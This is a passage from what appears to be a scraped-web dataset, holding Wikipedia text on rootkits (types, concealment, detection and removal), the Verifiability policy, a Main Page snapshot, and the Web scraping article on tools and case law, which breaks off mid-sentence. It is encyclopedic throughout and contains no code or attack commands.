virtual-machine based rootkit (VMBR), 46 while Blue Pill software is another. In 2009, researchers from Microsoft and North Carolina State University demonstrated a hypervisor-layer anti-rootkit called Hooksafe, which provides generic protection against kernel-mode rootkits. 47 Windows 10 introduced a new feature called "Device Guard", that takes advantage of virtualization to provide independent external protection of an operating system against rootkit-type malware. 48 A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a router, network card, 49 hard drive, or the system BIOS. 27 50 The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines 51 and in a PCI expansion card ROM. 52 In October 2008, criminals tampered with European credit-card-reading machines before they were installed. The devices intercepted and transmitted credit card details via a mobile phone network. 53 In March 2009, researchers Alfredo Ortega and Anibal Sacco published details of a BIOS-level Windows rootkit that was able to survive disk replacement and operating system re-installation. 54 55 56 A few months later they learned that some laptops are sold with a legitimate rootkit, known as Absolute CompuTrace or Absolute LoJack for Laptops, preinstalled in many BIOS images. This is an anti-theft technology system that researchers showed can be turned to malicious purposes. 24 Intel Active Management Technology, part of Intel vPro, implements out-of-band management, giving administrators remote administration, remote management, and remote control of PCs with no involvement of the host processor or BIOS, even when the system is powered off. Remote administration includes remote power-up and power-down, remote reset, redirected boot, console redirection, pre-boot access to BIOS settings, programmable filtering for inbound and outbound network traffic, agent presence checking, out-of-band policy-based alerting, access to system information, such as hardware asset information, persistent event logs, and other information that is stored in dedicated memory (not on the hard drive) where it is accessible even if the OS is down or the PC is powered off. Some of these functions require the deepest level of rootkit, a second non-removable spy computer built around the main computer. Sandy Bridge and future chipsets have "the ability to remotely kill and restore a lost or stolen PC via 3G". Hardware rootkits built into the chipset can help recover stolen computers, remove data, or render them useless, but they also present privacy and security concerns of undetectable spying and redirection by management or hackers who might gain control. Rootkits employ a variety of techniques to gain control of a system; the type of rootkit influences the choice of attack vector. The most common technique leverages security vulnerabilities to achieve surreptitious privilege escalation. Another approach is to use a Trojan horse, deceiving a computer user into trusting the rootkit's installation program as benign—in this case, social engineering convinces a user that the rootkit is beneficial. 29 The installation task is made easier if the principle of least privilege is not applied, since the rootkit then does not have to explicitly request elevated (administrator-level) privileges. Other classes of rootkits can be installed only by someone with physical access to the target system. Some rootkits may also be installed intentionally by the owner of the system or somebody authorized by the owner, e.g. for the purpose of employee monitoring, rendering such subversive techniques unnecessary. 57 Some malicious rootkit installations are commercially driven, with a pay-per-install (PPI) compensation method typical for distribution. 58 59 Once installed, a rootkit takes active measures to obscure its presence within the host system through subversion or evasion of standard operating system security tools and application programming interface (APIs) used for diagnosis, scanning, and monitoring. 60 Rootkits achieve this by modifying the behavior of core parts of an operating system through loading code into other processes, the installation or modification of drivers, or kernel modules. Obfuscation techniques include concealing running processes from system-monitoring mechanisms and hiding system files and other configuration data. 61 It is not uncommon for a rootkit to disable the event logging capacity of an operating system, in an attempt to hide evidence of an attack. Rootkits can, in theory, subvert any operating system activities. 62 The "perfect rootkit" can be thought of as similar to a "perfect crime": one that nobody realizes has taken place. Rootkits also take a number of measures to ensure their survival against detection and "cleaning" by antivirus software in addition to commonly installing into Ring 0 (kernel-mode), where they have complete access to a system. These include polymorphism (changing so their "signature" is hard to detect), stealth techniques, regeneration, disabling or turning off anti-malware software, 63 and not installing on virtual machines where it may be easier for researchers to discover and analyze them. The fundamental problem with rootkit detection is that if the operating system has been subverted, particularly by a kernel-level rootkit, it cannot be trusted to find unauthorized modifications to itself or its components. 62 Actions such as requesting a list of running processes, or a list of files in a directory, cannot be trusted to behave as expected. In other words, rootkit detectors that work while running on infected systems are only effective against rootkits that have some defect in their camouflage, or that run with lower user-mode privileges than the detection software in the kernel. 29 As with computer viruses, the detection and elimination of rootkits is an ongoing struggle between both sides of this conflict. 62 Detection can take a number of different approaches, including looking for virus "signatures" (e.g. antivirus software), integrity checking (e.g. digital signatures), difference-based detection (comparison of expected vs. actual results), and behavioral detection (e.g. monitoring CPU usage or network traffic). For kernel-mode rootkits, detection is considerably more complex, requiring careful scrutiny of the System Call Table to look for hooked functions where the malware may be subverting system behavior, 64 as well as forensic scanning of memory for patterns that indicate hidden processes. Unix rootkit detection offerings include Zeppoo, 65 chkrootkit, rkhunter and OSSEC. For Windows, detection tools include Microsoft Sysinternals RootkitRevealer, 66 Avast Antivirus, 67 Sophos Anti-Rootkit, 68 F-Secure, 69 Radix, 70 GMER, 71 and WindowsSCOPE. Any rootkit detectors that prove effective ultimately contribute to their own ineffectiveness, as malware authors adapt and test their code to escape detection by well-used tools. Notes 1 Detection by examining storage while the suspect operating system is not operational can miss rootkits not recognised by the checking software, as the rootkit is not active and suspicious behavior is suppressed; conventional anti-malware software running with the rootkit operational may fail if the rootkit hides itself effectively. The best and most reliable method for operating-system-level rootkit detection is to shut down the computer suspected of infection, and then to check its storage by booting from an alternative trusted medium (e.g. a "rescue" CD-ROM or USB flash drive). 72 The technique is effective because a rootkit cannot actively hide its presence if it is not running. The behavioral-based approach to detecting rootkits attempts to infer the presence of a rootkit by looking for rootkit-like behavior. For example, by profiling a system, differences in the timing and frequency of API calls or in overall CPU utilization can be attributed to a rootkit. The method is complex and is hampered by a high incidence of false positives. Defective rootkits can sometimes introduce very obvious changes to a system: the Alureon rootkit crashed Windows systems after a security update exposed a design flaw in its code. 73 74 Logs from a packet analyzer, firewall, or intrusion prevention system may present evidence of rootkit behaviour in a networked environment. 26 Antivirus products rarely catch all viruses in public tests (depending on what is used and to what extent), even though security software vendors incorporate rootkit detection into their products. Should a rootkit attempt to hide during an antivirus scan, a stealth detector may notice; if the rootkit attempts to temporarily unload itself from the system, signature detection (or "fingerprinting") can still find it. 75 This combined approach forces attackers to implement counterattack mechanisms, or "retro" routines, that attempt to terminate antivirus programs. Signature-based detection methods can be effective against well-published rootkits, but less so against specially crafted, custom-root rootkits. 62 Another method that can detect rootkits compares "trusted" raw data with "tainted" content returned by an API. For example, binaries present on disk can be compared with their copies within operating memory (in some operating systems, the in-memory image should be identical to the on-disk image), or the results returned from file system or Windows Registry APIs can be checked against raw structures on the underlying physical disks 62 76 —however, in the case of the former, some valid differences can be introduced by operating system mechanisms like memory relocation or shimming. A rootkit may detect the presence of such a difference-based scanner or virtual machine (the latter being commonly used to perform forensic analysis), and adjust its behaviour so that no differences can be detected. Difference-based detection was used by Russinovich's RootkitRevealer tool to find the Sony DRM rootkit. 1 Code signing uses public-key infrastructure to check if a file has been modified since being digitally signed by its publisher. Alternatively, a system owner or administrator can use a cryptographic hash function to compute a "fingerprint" at installation time that can help to detect subsequent unauthorized changes to on-disk code libraries. 77 However, unsophisticated schemes check only whether the code has been modified since installation time; subversion prior to that time is not detectable. The fingerprint must be re-established each time changes are made to the system: for example, after installing security updates or a service pack. The hash function creates a message digest, a relatively short code calculated from each bit in the file using an algorithm that creates large changes in the message digest with even smaller changes to the original file. By recalculating and comparing the message digest of the installed files at regular intervals against a trusted list of message digests, changes in the system can be detected and monitored—as long as the original baseline was created before the malware was added. More-sophisticated rootkits are able to subvert the verification process by presenting an unmodified copy of the file for inspection, or by making code modifications only in memory, reconfiguration registers, which are later compared to a white list of expected values. 78 The code that performs hash, compare, or extend operations must also be protected—in this context, the notion of an immutable root-of-trust holds that the very first code to measure security properties of a system must itself be trusted to ensure that a rootkit or bootkit does not compromise the system at its most fundamental level. 79 Forcing a complete dump of virtual memory will capture an active rootkit (or a kernel dump in the case of a kernel-mode rootkit), allowing offline forensic analysis to be performed with a debugger against the resulting dump file, without the rootkit being able to take any measures to cloak itself. This technique is highly specialized, and may require access to non-public source code or debugging symbols. Memory dumps initiated by the operating system cannot always be used to detect a hypervisor-based rootkit, which is able to intercept and subvert the lowest-level attempts to read memory 6 —a hardware device, such as one that implements a non-maskable interrupt, may be required to dump memory in this scenario. 80 81 Virtual machines also make it easier to analyze the memory of a compromised machine from the underlying hypervisor, so some rootkits will avoid infecting virtual machines for this reason. Manual removal of a rootkit is often extremely difficult for a typical computer user, 27 but a number of security-software vendors offer tools to automatically detect and remove some rootkits, typically as part of an antivirus suite. As of 2005 update , Microsoft's monthly Windows Malicious Software Removal Tool is able to detect and remove some classes of rootkits. 82 83 Also, Windows Defender Offline can remove rootkits, as it runs from a trusted environment before the operating system starts. 84 Some antivirus scanners can bypass file system APIs, which are vulnerable to manipulation by a rootkit. Instead, they access raw file system structures directly, and use this information to validate the results from the system APIs to identify any differences that may be caused by a rootkit. Notes 2 85 86 87 88 There are experts who believe that the only reliable way to remove them is to re-install the operating system from trusted media. 89 90 This is because antivirus and malware removal tools running on an untrusted system may be ineffective against well-written kernel-mode rootkits. Booting an alternative operating system from trusted media can allow an infected system volume to be mounted and potentially safely cleaned and critical data to be copied off—or, alternatively, a forensic examination performed. 26 Lightweight operating systems such as Windows PE, Windows Recovery Console, Windows Recovery Environment, BartPE, or Live Distros can be used for this purpose, allowing the system to be "cleaned". Even if the type and nature of a rootkit is known, manual repair may be impractical, while re-installing the operating system and applications is safer, simpler and quicker. 89 System hardening represents one of the first layers of defence against a rootkit, to prevent it from being able to install. 91 Applying security patches, implementing the principle of least privilege, reducing the attack surface and installing antivirus software are some standard security best practices that are effective against all classes of malware. 92 New secure boot specifications like UEFI have been designed to address the threat of bootkits, but even these are vulnerable if the security features they offer are not utilized. 50 For server systems, remote server attestation using technologies such as Intel Trusted Execution Technology (TXT) provide a way of verifying that servers remain in a known good state. For example, Microsoft Bitlocker's encryption of data-at-rest verifies that servers are in a known "good state" on bootup. PrivateCore vCage is a software offering that secures data-in-use (memory) to avoid bootkits and rootkits by verifying servers are in a known "good" state on bootup. The PrivateCore implementation works in concert with Intel TXT and locks down server system interfaces to avoid potential bootkits and rootkits. Another defense mechanism called the Virtual Wall (VTW) approach, serves as a lightweight hypervisor with rootkit detection and event tracing capabilities. In normal operation (guest mode), Linux runs, and when a loaded LKM violates security policies, the system switches to host mode. The VTW in host mode detects, traces, and classifies rootkit events based on memory access control and event injection mechanisms. Experimental results demonstrate the VTW's effectiveness in timely detection and defense against kernel rootkits with minimal CPU overhead (less than 2%). The VTW is compared favorably to other defense schemes, emphasizing its simplicity in implementation and potential performance gains on Linux servers. 93 |
67 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Verifiability | In the English Wikipedia, verifiability means people using the encyclopedia can check that the information comes from a reliable source. Its content is determined by previously published information rather than editors' beliefs, opinions, experiences, or previously unpublished ideas or information. Even if you are sure something is true, it must have been previously published in a reliable source before you can add it. a If reliable sources disagree with each other, then maintain a neutral point of view and present what the various sources say, giving each side its due weight. All material in Wikipedia mainspace, including everything in articles, lists, and captions, must be verifiable. Additionally, four types of information must be accompanied by an inline citation to a reliable source that directly supports b the material. The four types are: Any material that needs an inline citation but does not have one may be removed. Please immediately remove contentious material about living people (or existing groups) that is unsourced or poorly sourced. For how to write citations, see citing sources. Verifiability, no original research, and neutral point of view are Wikipedia's core content policies. They work together to determine content, so editors should understand the key points of all three. Articles must also comply with the copyright policy. All content must be verifiable. The burden to demonstrate verifiability lies with the editor who adds or restores material, and it is satisfied by providing an inline citation to a reliable source that directly supports b the contribution. c Using inline citations, provide reliable, published sources for all: The cited source must clearly support the material as presented in the article. Cite the source clearly, ideally giving page number(s)—though sometimes a section, chapter, or other division may be appropriate instead; see Wikipedia:Citing sources for details of how to do this. Any material lacking an inline citation to a reliable source that directly supports b the material may be removed and should not be restored without an inline citation to a reliable source. Whether and how quickly material should be initially removed for not having an inline citation to a reliable source depends on the material and the overall state of the article. In some cases, editors may object if you remove material without giving them time to provide references. Consider adding a citation needed tag as an interim step. d When tagging or removing material for lacking an inline citation, please state your concern that it may not be possible to find a published reliable source, and the material therefore may not be verifiable. e If you think the material is verifiable, you are encouraged to provide an inline citation yourself before considering whether to remove or tag it. Do not leave unsourced or poorly sourced material in an article if it might damage the reputation of living people 1 or existing groups, and do not move it to the talk page. You should also be aware of how Wikipedia:Biographies of living persons also applies to groups. A cited source on Wikipedia is often a specific portion of text (such as a short article or a page in a book). But when editors discuss sources (for example, to debate their appropriateness or reliability) the word source has four related meanings: All four can affect reliability. Base articles on reliable, independent, published sources with a reputation for fact-checking and accuracy. Source material must have been published, the definition of which for the purposes of Wikipedia is made available to the public in some form. f Unpublished materials are not considered reliable. Use sources that directly support the material presented in an article and are appropriate to the claims made. The appropriateness of any source depends on the context. Be especially careful when sourcing content related to living people or medicine. If available, academic and peer-reviewed publications are usually the most reliable sources on topics such as history, medicine, and science. Editors may also use material from reliable non-academic sources, particularly if it appears in respected mainstream publications. Other reliable sources include: Editors may also use electronic media, subject to the same criteria (see details in Wikipedia:Identifying reliable sources and Wikipedia:Search engine test). The best sources have a professional structure for checking or analyzing facts, legal issues, evidence, and arguments. The greater the degree of scrutiny given to these issues, the more reliable the source. Some newspapers, magazines, and other news organizations host online pages, columns or rolling text they call blogs. These may be acceptable sources if the writers are professionals, but use them with caution because blogs may not be subject to the news organization's normal fact-checking process. g If a news organization publishes an opinion piece in a blog, attribute the statement to the writer, e.g. "Jane Smith wrote ... Never use the blog comments that are left by the readers as sources. For personal or group blogs that are not reliable sources, see Self-published sources below. To discuss the reliability of a specific source for a particular statement, consult Wikipedia:Reliable sources Noticeboard, which seeks to apply this policy to particular cases. For a guideline discussing the reliability of particular types of sources, see Wikipedia:Reliable sources. In the case of inconsistency between this policy and the Wikipedia:Reliable sources guideline, or any other guideline related to sourcing, this policy has priority. Questionable sources are those that have a poor reputation for checking the facts, lack meaningful editorial oversight, or have an apparent conflict of interest. Such sources include websites and publications expressing views widely considered by other sources to be promotional, extremist, or relying heavily on unsubstantiated gossip, rumor, or personal opinion. Questionable sources should be used only as sources for material on themselves, such as in articles about themselves; see below. They are not suitable sources for contentious claims about others. Predatory open access journals are considered questionable due to the absence of quality control in the peer-review process. Anyone can create a personal web page, self-publish a book, or claim to be an expert. That is why self-published material such as books, patents, newsletters, personal websites, open wikis, personal or group blogs (as distinguished from newsblogs, above), content farms, Internet forum postings, and social media postings are largely not acceptable as sources. Self-published expert sources may be considered reliable when produced by an established subject-matter expert, whose work in the relevant field has previously been published by reliable, independent publications. g Exercise caution when using such sources: if the information in question is suitable for inclusion, someone else will probably have published it in independent, reliable sources. 2 Never use self-published sources as third-party sources about living people, even if the author is an expert, well-known professional researcher, or writer. Self-published and questionable sources may be used as sources of information about themselves, usually in articles about themselves or their activities, without the self-published source requirement that they are established experts in the field, so long as: This policy also applies to material made public by the source on social networking websites such as Twitter, Tumblr, LinkedIn, Reddit, and Facebook. Do not use articles from Wikipedia (whether English Wikipedia or Wikipedias in other languages) as sources, since Wikipedia is a user-generated source. Also, do not use websites mirroring Wikipedia content or publications relying on material from Wikipedia as sources. Content from a Wikipedia article is not considered reliable unless it is backed up by citing reliable sources. Confirm that these sources support the content, then use them directly. 3 An exception is allowed when Wikipedia itself is being discussed in the article. These may cite an article, guideline, discussion, statistic, or other content from Wikipedia (or a sister project) to support a statement about Wikipedia. Wikipedia or the sister project is a primary source in this case and may be used following the policy for primary sources. Any such use should avoid original research, undue emphasis on Wikipedia's role or views, and inappropriate self-reference. The article text should clarify how the material is sourced from Wikipedia to inform the reader about the potential bias. Do not reject reliable sources just because they are difficult or costly to access. Some reliable sources are not easily accessible. For example, an online source may require payment, and a print-only source may be available only through libraries. Rare historical sources may even be available only in special museum collections and archives. If you have trouble accessing a source, others may be able to do so on your behalf (see WikiProject Resource Exchange). Citations to non-English reliable sources are allowed on the English Wikipedia. However, because this project is in English, English-language sources are preferred over non-English ones when they are available and of equal quality and relevance. As with sources in English, if a dispute arises involving a citation to a non-English source, editors may request a quotation of relevant portions of the original source be provided, either in text, in a footnote, or on the article talk page. h (See Template:Request quotation.) If you quote a non-English reliable source (whether in the main text or in a footnote), a translation into English should accompany the quote. Translations published by reliable sources are preferred over translations by Wikipedians, but translations by Wikipedians are preferred over machine translations. When using a machine translation of source material, editors should be reasonably certain that the translation is accurate and the source is appropriate. Editors should not rely upon machine translations of non-English sources in contentious articles or biographies of living people. If needed, ask an editor who can translate it for you. The original text is usually included with the translated text in articles when translated by Wikipedians, and the translating editor is usually not cited. When quoting any material, whether in English or in some other language, be careful not to violate copyright; see the fair-use guideline. While information must be verifiable for inclusion in an article, not all verifiable information must be included. Consensus may determine that certain information does not improve an article. Such information should be omitted or presented instead in a different article. The responsibility for achieving consensus for inclusion is on those seeking to include disputed content. If you want to request an inline citation for an unsourced statement, you can tag a sentence with the citation needed template by writing cn or fact . Other templates exist for tagging sections or entire articles here. You can also leave a note on the talk page asking for a source, or move the material to the talk page and ask for a source there. To request verification that a reference supports the text, tag it with verification needed . Material that fails verification may be tagged with failed verification or removed. It helps other editors to explain your rationale for using templates to tag material in the template, edit summary, or on the talk page. Take special care with contentious material about living and recently deceased people. Unsourced or poorly sourced material that is contentious, especially text that is negative, derogatory, or potentially damaging, should be removed immediately rather than tagged or moved to the talk page. Any exceptional claim requires multiple high-quality sources. 4 Warnings (red flags) that should prompt extra caution include: Do not plagiarize or breach copyright when using sources. Summarize source material in your own words as much as possible; when quoting or closely paraphrasing a source, use an inline citation, and in-text attribution where appropriate. Do not link to any source that violates the copyrights of others per contributors' rights and obligations. You can link to websites that display copyrighted works as long as the website has licensed the work or uses the work in a way compliant with fair use. Knowingly directing others to material that violates copyright may be considered contributory copyright infringement. If there is reason to think a source violates copyright, do not cite it. This is particularly relevant when linking to sites such as Scribd or YouTube, where due care should be taken to avoid linking to material violating copyright. Even when information is cited to reliable sources, you must present it with a neutral point of view (NPOV). Articles should be based on thorough research of sources. All articles must adhere to NPOV, fairly representing all majority and significant-minority viewpoints published by reliable sources, in rough proportion to the prominence of each view. Tiny-minority views need not be included, except in articles devoted to them. If there is a disagreement between sources, use in-text attribution: "John Smith argues X, while Paul Jones maintains Y, followed by an inline citation. Sources themselves do not need to maintain a neutral point of view. Indeed, many reliable sources are not neutral. Our job as editors is simply to summarize what reliable sources say. If no reliable, independent sources can be found on a topic, Wikipedia should not have an article on it (i.e., the topic is not notable). However, notability is based on the existence of suitable sources, not on the state of sourcing in an article (WP:NEXIST). The no original research policy (NOR) is closely related to the Verifiability policy. Among its requirements are: |
68 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Main_Page | On December 8, 1963, Pan Am Flight 214 crashed near Elkton, Maryland, killing all 81 crew and passengers. Flight 214 had originated at Isla Verde International Airport in San Juan, flying to Friendship Airport near Baltimore, and then took off for Philadelphia. The crash was Pan Am's first fatal accident with the Boeing 707 121, which it had introduced to its fleet five years earlier. An investigation by the Civil Aeronautics Board concluded that the probable cause of the crash was a lightning strike that had ignited fuel vapors in one of the aircraft's fuel tanks, causing an explosion that destroyed the left wing. The exact manner of ignition was never determined, but the investigation increased awareness of how lightning can damage aircraft, leading to new regulations. The crash also led to research into the safety of several types of aviation fuel and into ways of changing the design of aircraft fuel systems to make them safer in the event of lightning strikes. (Full article...) August 17 NGC 3324 is an open cluster in the southern constellation Carina, located northwest of the Carina Nebula at a distance of 9,100 ly (2,800 pc) from Earth. The two are often confused as a single object, and together have been nicknamed the "Gabriela Mistral Nebula" due to its resemblance to the Chilean poet. NGC 3324 was first catalogued by James Dunlop in 1826. This infrared photograph by NASA’s James Webb Space Telescope shows a young, star-forming region in the western section of NGC 3324 known as the "Cosmic Cliffs". Photograph credit: NASA Wikipedia is written by volunteer editors and hosted by the Wikimedia Foundation, a non-profit organization that also hosts a range of other volunteer projects: This Wikipedia is written in English. Many other Wikipedias are available; some of the largest are listed below. |
69 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-11 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally 